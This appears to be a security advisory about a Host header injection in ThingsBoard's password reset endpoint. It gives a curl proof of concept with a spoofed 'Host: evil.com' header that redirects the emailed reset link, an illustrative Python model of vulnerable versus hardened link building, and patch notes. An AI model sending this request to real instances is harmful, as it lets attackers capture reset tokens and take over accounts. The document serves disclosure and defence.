This vulnerability allows an attacker to inject an arbitrary Host header. ThingsBoard uses the request's Host header when generating absolute URLs, among them the password reset link sent to the user, so the attacker controls where that link points.
PoC (the Host header is attacker-controlled; the remaining headers mimic a normal browser request from the reset form):
# Request a password reset for the victim while spoofing the Host header
curl 'https://thingsboard_host/api/noauth/resetPasswordByEmail' \
  -H 'Host: evil.com' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/plain, */*' \
  -H 'User-Agent: Mozilla/5.0' \
  -H 'Content-Type: application/json' \
  -H 'Origin: https://thingsboard_host' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Referer: https://thingsboard_host/login/resetPasswordRequest' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  --data-binary '{"email":"victim@example"}' \
  --compressed
This sends the victim a genuine ThingsBoard email whose reset link points to https://evil.com instead of the real ThingsBoard URL. Because the mail itself comes from the legitimate instance, an attacker can trick users into submitting their password reset tokens and new passwords to an attacker-controlled site, and then use the captured token to complete the reset against the real instance.
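To make the failure mode concrete, here is an added Python model of the two link-building strategies. This is example code written for this report, not ThingsBoard's own implementation; the reset path `/login/resetPassword?resetToken=`, the header names and the hostnames are assumptions. The vulnerable version rebuilds the absolute URL from the request's Host header, exactly the behaviour the PoC above abuses; the hardened version uses an operator-configured base URL and only falls back to the request Host when it appears on an explicit allowlist.

```python
"""Illustrative model of Host-header-driven reset links (added example, not ThingsBoard code)."""
from typing import Dict, FrozenSet, Optional
from urllib.parse import urlsplit

# Assumed reset path; the real ThingsBoard path may differ.
RESET_PATH = "/login/resetPassword?resetToken="


class UntrustedHostError(ValueError):
    """Raised when the request Host is not an allowed origin for outbound links."""


def reset_link_vulnerable(headers: Dict[str, str], token: str) -> str:
    """Vulnerable pattern: the absolute URL is rebuilt from the client-controlled Host header.

    Whatever the attacker puts in `Host:` ends up in the email sent to the victim.
    """
    scheme = headers.get("X-Forwarded-Proto", "https")
    host = headers["Host"]
    return f"{scheme}://{host}{RESET_PATH}{token}"


def reset_link_hardened(headers: Dict[str, str], token: str, base_url: Optional[str],
                        allowed_hosts: FrozenSet[str] = frozenset()) -> str:
    """Hardened pattern: an operator-configured base URL wins; the request Host is used
    only when it matches an explicit allowlist entry (exact match, including any port).
    """
    if base_url:
        base = base_url.rstrip("/")
    else:
        host = headers.get("Host", "").strip().lower()
        if host not in allowed_hosts:
            raise UntrustedHostError(f"refusing to build reset link for Host {host!r}")
        base = f"https://{host}"
    return f"{base}{RESET_PATH}{token}"


def link_host(link: str) -> str:
    """Return the host the victim's browser would contact when following `link`."""
    return urlsplit(link).hostname or ""


# Constructed request mirroring the PoC: only the Host header is attacker-controlled.
ATTACKER_REQUEST = {
    "Host": "evil.com",
    "Origin": "https://thingsboard_host",
    "Referer": "https://thingsboard_host/login/resetPasswordRequest",
}


def demo() -> Dict[str, str]:
    """Build the reset link under each strategy and report where it points."""
    token = "deadbeef"  # placeholder, not a real ThingsBoard token format
    results = {}
    results["vulnerable"] = link_host(reset_link_vulnerable(ATTACKER_REQUEST, token))
    results["hardened"] = link_host(
        reset_link_hardened(ATTACKER_REQUEST, token, "https://thingsboard.example"))
    try:
        reset_link_hardened(ATTACKER_REQUEST, token, base_url=None,
                            allowed_hosts=frozenset({"thingsboard.example"}))
        results["fallback"] = "accepted"
    except UntrustedHostError:
        results["fallback"] = "rejected"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The point of the allowlist fallback is that a reverse proxy in front of the application normally rewrites or validates Host anyway; if the application must derive links from the request, it should at least refuse hosts it was never deployed under rather than trusting the header blindly.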
This appears to have been patched in 3.2, where an option is provided to disable this behaviour.
UI change: https://github.com/thingsboard/thingsboard/commit/6cc8eada320b9fb716da67f51939d3e94c024852
A default installation would still be vulnerable, though, since that option is not enabled out of the box.